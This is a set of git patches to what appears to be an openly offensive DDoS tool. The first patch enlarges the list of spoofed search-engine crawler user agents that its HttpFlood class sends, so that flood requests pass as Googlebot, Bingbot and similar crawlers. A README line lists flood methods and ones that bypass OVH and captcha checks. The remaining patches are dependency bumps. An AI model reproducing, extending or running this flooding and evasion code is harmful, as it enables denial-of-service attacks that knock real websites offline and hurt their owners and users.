From 364c3a2e5afd251260c10ced551acf625dcfb2e0 Mon Sep 17 00:00:00 2001 From: hosyn <77008435+WTFitsmemyself@users.noreply.github.com> Date: Sun, 21 Sep 2025 15:18:12 +0330 Subject: [PATCH 1/5] Update search engine list --- start.py | 78 +++++++++++++++++++++++++++++++++++++++++++++++++------- 1 file changed, 69 insertions(+), 9 deletions(-) diff --git a/start.py b/start.py index 4448ee0..aa21922 100644 --- a/start.py +++ b/start.py @@ -134,13 +134,73 @@ class Methods: ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS} -google_agents = [ - "Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", - "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, " - "like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; " - "+http://www.google.com/bot.html)) " - "Googlebot/2.1 (+http://www.google.com/bot.html)", - "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" +search_engine_agents = [ + # ---------------- Google ---------------- + "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", + "Googlebot/2.1 (+http://www.googlebot.com/bot.html)", + "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; " + "+http://www.google.com/bot.html) Chrome/103.0.5060.134 Safari/537.36", + "Googlebot-Image/1.0", + "Googlebot-Video/1.0", + "Googlebot-News", + "AdsBot-Google (+http://www.google.com/adsbot.html)", + "AdsBot-Google-Mobile-Apps", + "AdsBot-Google-Mobile (+http://www.google.com/mobile/adsbot.html)", + "Mediapartners-Google", + "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)", + + # ---------------- Bing / Microsoft ---------------- + "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", + "BingPreview/1.0b", + "AdIdxBot/2.0 (+http://www.bing.com/bingbot.htm)", + + # ---------------- Yahoo ---------------- + "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", + "Yahoo! Slurp China", + + # ---------------- Yandex ---------------- + "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)", + "YandexMobileBot/3.0 (+http://yandex.com/bots)", + "YandexImages/3.0 (+http://yandex.com/bots)", + "YandexVideo/3.0 (+http://yandex.com/bots)", + "YandexNews/3.0 (+http://yandex.com/bots)", + + # ---------------- Baidu ---------------- + "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", + "Baiduspider-image (+http://www.baidu.com/search/spider.html)", + "Baiduspider-video (+http://www.baidu.com/search/spider.html)", + + # ---------------- DuckDuckGo ---------------- + "DuckDuckBot/1.0; (+http://duckduckgo.com/duckduckbot.html)", + "DuckDuckBot/2.0; (+http://duckduckgo.com/duckduckbot.html)", + + # ---------------- Applebot ---------------- + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 " + "(KHTML, like Gecko) Version/14.0 Safari/605.1.15 (Applebot/0.1; " + "+http://www.apple.com/go/applebot)", + + # ---------------- Facebook / Social ---------------- + "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)", + "Facebot/1.0", + + # ---------------- Twitter ---------------- + "Twitterbot/1.0", + + # ---------------- LinkedIn ---------------- + "LinkedInBot/1.0 (+https://www.linkedin.com/)", + + # ---------------- Pinterest ---------------- + "Pinterest/0.2 (+http://www.pinterest.com/bot.html)", + + # ---------------- Other Major Bots ---------------- + "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)", + "SemrushBot/7~bl (+http://www.semrush.com/bot.html)", + "MJ12bot/v1.4.8 (http://mj12bot.com/)", + "Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07)", + "Exabot/3.0 (+http://www.exabot.com/go/robot)", + "SeznamBot/3.2 (http://napoveda.seznam.cz/seznambot-intro/)", + "CCBot/2.0 (+http://commoncrawl.org/faq/)", + "DotBot/1.1 (+http://www.opensiteexplorer.org/dotbot, help@moz.com)" ] @@ -942,14 +1002,14 @@ class HttpFlood(Thread): "Host: %s\r\n" % self._target.raw_authority + "Connection: Keep-Alive\r\n" "Accept: text/plain,text/html,*/*\r\n" - "User-Agent: %s\r\n" % randchoice(google_agents) + + "User-Agent: %s\r\n" % randchoice(search_engine_agents) + "Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode( "GET /sitemap.xml HTTP/1.1\r\n" "Host: %s\r\n" % self._target.raw_authority + "Connection: Keep-Alive\r\n" "Accept: */*\r\n" "From: googlebot(at)googlebot.com\r\n" - "User-Agent: %s\r\n" % randchoice(google_agents) + + "User-Agent: %s\r\n" % randchoice(search_engine_agents) + "Accept-Encoding: gzip,deflate,br\r\n" "If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9), ProxyTools.Random.rand_str(4)) + From 17000f8e06e6552ad9ca7dc85b7dbcf2f4d5bcd9 Mon Sep 17 00:00:00 2001 From: _MRZT721010_ <69120140+mrzt721010@users.noreply.github.com> Date: Thu, 16 Oct 2025 00:38:17 +0330 Subject: [PATCH 2/5] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 81ef866..058e437 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,7 @@ * get GET | GET Flood * post POST | POST Flood - * ovh OVH | Bypass OVH + * ovh OVH | Bypass OVH * ovh RHEX | Random HEX * ovh STOMP | Bypass chk_captcha * stress STRESS | Send HTTP Packet With High Byte From 8cacc707b676db62296ca129d00a84db867efcc5 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 21 Oct 2025 21:42:41 +0000 Subject: [PATCH 3/5] Bump certifi from 2022.12.7 to 2024.7.4 Bumps [certifi](https://github.com/certifi/python-certifi) from 2022.12.7 to 2024.7.4. - [Commits](https://github.com/certifi/python-certifi/compare/2022.12.07...2024.07.04) --- updated-dependencies: - dependency-name: certifi dependency-version: 2024.7.4 dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ba4050f..7fba2a8 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ cloudscraper==1.2.71 -certifi==2022.12.7 +certifi==2024.7.4 dnspython==2.2.1 requests==2.27.1 impacket==0.10.0 From a5e8bc0db2f272c7865d0d12bb3ca7ae8f6246a8 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 21 Oct 2025 21:42:53 +0000 Subject: [PATCH 4/5] Bump requests from 2.27.1 to 2.32.4 Bumps [requests](https://github.com/psf/requests) from 2.27.1 to 2.32.4. - [Release notes](https://github.com/psf/requests/releases) - [Changelog](https://github.com/psf/requests/blob/main/HISTORY.md) - [Commits](https://github.com/psf/requests/compare/v2.27.1...v2.32.4) --- updated-dependencies: - dependency-name: requests dependency-version: 2.32.4 dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ba4050f..59d3bf7 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ cloudscraper==1.2.71 certifi==2022.12.7 dnspython==2.2.1 -requests==2.27.1 +requests==2.32.4 impacket==0.10.0 psutil>=5.9.3 icmplib>=2.1.1 From db0950e91de18ce621855ab88e7dfe5b4a0178d5 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 21 Oct 2025 21:47:46 +0000 Subject: [PATCH 5/5] Bump dnspython from 2.2.1 to 2.6.1 Bumps [dnspython](https://github.com/rthalley/dnspython) from 2.2.1 to 2.6.1. - [Release notes](https://github.com/rthalley/dnspython/releases) - [Changelog](https://github.com/rthalley/dnspython/blob/main/doc/whatsnew.rst) - [Commits](https://github.com/rthalley/dnspython/compare/v2.2.1...v2.6.1) --- updated-dependencies: - dependency-name: dnspython dependency-version: 2.6.1 dependency-type: direct:production ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 18cd301..cefd72f 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ cloudscraper==1.2.71 certifi==2024.7.4 -dnspython==2.2.1 +dnspython==2.6.1 requests==2.32.4 impacket==0.10.0 psutil>=5.9.3